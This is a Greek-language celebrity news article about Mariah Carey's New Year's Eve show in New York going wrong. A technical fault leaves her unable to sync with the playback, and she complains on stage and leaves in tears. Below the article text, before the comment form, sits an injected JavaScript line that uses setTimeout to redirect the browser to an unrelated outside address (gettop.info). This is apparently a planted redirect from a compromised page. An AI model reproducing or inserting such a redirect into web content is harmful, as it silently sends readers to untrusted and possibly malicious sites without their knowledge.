Κατέρρευσε στη σκηνή η Μαράια Κάρεϊ – Ξέσπασε σε λυγμούς κι αποχώρησε (ΒΙΝΤΕΟ)

0
14

 

Άφωνη… έμεινε η Μαράια Κάρεϊ και το κοινό που περίμενε τη σταρ να τραγουδήσει στην πρωτοχρονιάτικη γιορτή που είχε στηθεί στη Νέα Υόρκη. Χάος επικρατούσε στις πρόβες, οι διοργανωτές έτρεμαν μήπως η ντίβα τους στήσει. Ο χορευτής σύντροφός της τη μετέφερε στα χέρια για να ανέβει στη σκηνή και μετά συνέβη το ανείπωτο!

Η συναυλία ξεκίνησε αλλά λόγω τεχνικού προβλήματος η καλλιτέχνις δεν μπόρεσε να συγχρονιστεί με το τραγούδι που ακουγόταν. Κυκλοφορούσε στη σκηνή ζητώντας από τα μόνιτορ να στρέφονται διαρκώς πάνω της ενώ προσπάθησε να σώσει τα «καμένα» χορεύοντας ελάχιστα.

«Προσπαθώ να κάνω τον αθλητή εδώ!» διαμαρτυρήθηκε από το μικρόφωνό της. «Δεν κάναμε πρόβα σ αυτό το τραγούδι, μας λείπουν κάποια φωνητικά, αυτό είναι. Θα αφήσω το κοινό να τραγουδήσει. Δεν κάναμε sound check γι αυτό το πρωτοχρονιάτικο μωρό. Αυτό είναι όλο!» συνέχισε.

Όταν πλέον έληξε και το δεύτερο τραγούδι, 15 λεπτά πριν από τα μεσάνυχτα, η Μαράια που δεν κατάφερε να συγχρονιστεί και σ’ αυτό ξέσπασε σε κλάματα. «Όλοι κάνουν διακοπές!Δεν μπορώ να απολαύσω κι εγώ μια φορά!» είπε κλαίγοντας κι εγκατέλειψε τη σκηνή αφήνοντας κοινό και διοργανωτές στα κρύα του λουτρού.

Ώρες μετά θέλησε να διασκεδάσει τις εντυπώσεις με ένα μήνυμά της στο instagram: «Σ@@@ά συμβαίνουν. Καλή χρονιά με υγεία για όλους»

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here